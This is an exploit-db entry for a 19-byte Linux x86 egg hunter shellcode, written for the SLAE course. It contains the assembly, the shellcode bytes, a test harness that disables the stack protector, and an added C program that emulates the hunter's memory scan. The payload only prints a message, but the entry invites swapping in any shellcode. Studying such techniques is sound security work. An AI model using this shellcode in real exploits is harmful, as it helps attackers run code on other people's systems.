Linux x86 Egg Hunter Shellcode 19 bytes

Published 10 Aug 2015 00:00:00. Reported by Guillaume Kaddouch. Type: exploitdb. Source: www.exploit-db.com. 34 views.

Linux x86 egg hunter shellcode, 19 bytes. Written as an exercise for the SLAE course; it uses a 4-byte egg and stores an altered egg signature so that the signature itself never appears in the hunter's bytes.

Code
/*
Title: Linux x86 Egg Hunter Shellcode (19 bytes)
Date: 4 August 2015
Author: Guillaume Kaddouch
Website: http://networkfilter.blogspot.com
Twitter: @gkweb76
Tested on: Ubuntu 14.04.2 LTS x86, Kali Linux 1.0.9 x86

This code was created as an exercise for the SecurityTube Linux Assembly Expert (SLAE) course.

Egg signature = 0x50905090 (push eax, nop, push eax, nop; stored little-endian in memory as \x90\x50\x90\x50)
Egg hunters usually use a 2 * 4 bytes (8 bytes) egg, because a scan that sweeps over the hunter's own code would otherwise
match the hardcoded egg signature inside the hunter itself. The hunter below never stores the signature verbatim (it loads
signature - 1 and increments it), so a single 4-byte check is enough.

egg-hunter.asm:
----------------

global _start

section .text

_start:
        mov eax, addr                   ; retrieve a valid address to start from (shorter than using JMP CALL POP)
        mov ebx, dword 0x5090508f       ; altered egg signature: 0x50905090 - 1, so the real signature is not stored in the code
        inc ebx                         ; restore the real egg signature in ebx

next_addr:
        inc eax                         ; advance one byte to the next address to examine
        cmp dword [eax], ebx            ; compare the dword at that address with the egg; ZF = 1 on a match
        jne next_addr                   ; ZF = 0 (no match): keep scanning
        jmp eax                         ; ZF = 1 (egg found): jump to it; the egg bytes themselves decode as nop / push eax
                                        ; note: there is no access() page check, so reading an unmapped page faults

        addr: db 0x1
*/

/*
myegg.c:
-----------
Compile with: gcc -fno-stack-protector -z execstack myegg.c -o myegg
*/

#include <stdio.h>
#include <string.h>

// Egg hunter, 19 bytes (contains no \x00, \x0a or \x0d bytes)
unsigned char egghunter[] =
"\xb8\x72\x80\x04\x08"          // mov eax, 0x08048072 (address of `addr`)
"\xbb\x8f\x50\x90\x50"          // mov ebx, 0x5090508f
"\x43"                          // inc ebx
"\x40"                          // inc eax
"\x39\x18"                      // cmp [eax], ebx
"\x75\xfb"                      // jne next_addr
"\xff\xe0"                      // jmp eax
"\x01";                         // addr: db 0x1

// Prints 'Egg Found!!' on screen
// You can swap it out with any shellcode you like (as long as you keep the egg mark)
unsigned char shellcode[] =
"\x90\x50\x90\x50" // egg mark
"\xeb\x16\x59\x31\xc0\x50\xb0\x04\x31\xdb\xb3\x01\x31\xd2\xb2"
"\x0c\xcd\x80\x31\xc0\xb0\x01\xcd\x80\xe8\xe5\xff\xff\xff\x45"
"\x67\x67\x20\x46\x6f\x75\x6e\x64\x21\x21\x0a";

int main(void)
{
        printf("Egg hunter shellcode Length:  %zu\n", strlen((char *)egghunter));
        int (*ret)() = (int(*)())egghunter;
        ret();
        return 0;
}
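The header's argument is that a 4-byte egg is safe only because the signature never appears inside the hunter. The following C program, added here as an example and not part of the original exploit-db entry, emulates the scan loop over a constructed flat buffer and checks that claim: the page's hunter lands on the payload, while a hypothetical `naive` variant (constructed for this example; it loads 0x50905090 with a plain `mov ebx`) matches its own bytes first. The layout offsets and the filler payload are assumptions of the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed copies for this example: `hunter` is the page's 19-byte egg hunter;
   `naive` is a hypothetical variant that does `mov ebx, 0x50905090` directly
   instead of loading 0x5090508f and `inc ebx`, so the signature sits in its bytes. */
static const unsigned char hunter[] =
    "\xb8\x72\x80\x04\x08\xbb\x8f\x50\x90\x50\x43\x40\x39\x18\x75\xfb\xff\xe0\x01";
static const unsigned char naive[] =
    "\xb8\x72\x80\x04\x08\xbb\x90\x50\x90\x50\x40\x39\x18\x75\xfb\xff\xe0\x01";
/* Stand-in payload: the 4-byte egg mark followed by filler (constructed). */
static const unsigned char payload[] = "\x90\x50\x90\x50\xcc\xcc\xcc\xcc";
#define EGG 0x50905090u

/* Little-endian dword read, i.e. what `cmp dword [eax], ebx` compares. */
static uint32_t rd32(const unsigned char *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Emulate the hunt loop over a flat buffer: test the dword at every byte offset
   from `first` upward; return the first offset holding `egg`, or -1 if none.
   A flat buffer has no unmapped pages, so unlike the real loop it cannot fault. */
long hunt(const unsigned char *mem, size_t len, size_t first, uint32_t egg) {
    for (size_t i = first; i + 4 <= len; i++)
        if (rd32(mem + i) == egg) return (long)i;
    return -1;
}

/* Memory image: 16 filler bytes, the hunter code, 64 filler bytes, the payload.
   The scan starts at offset 0, below the hunter, and sweeps through it, as a
   hardcoded start address below the hunter makes the real loop do. */
long simulate(const unsigned char *code, size_t code_len) {
    unsigned char mem[16 + 19 + 64 + 8];
    memset(mem, 0x41, sizeof mem);
    memcpy(mem + 16, code, code_len);
    memcpy(mem + 16 + 19 + 64, payload, sizeof payload - 1);
    return hunt(mem, sizeof mem, 0, EGG);
}

int main(void) {
    printf("page hunter: egg found at offset %ld (payload is at %d)\n",
           simulate(hunter, 19), 16 + 19 + 64);
    printf("naive hunter: egg found at offset %ld (inside its own bytes, 16 + 6)\n",
           simulate(naive, 18));
    return 0;
}
```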
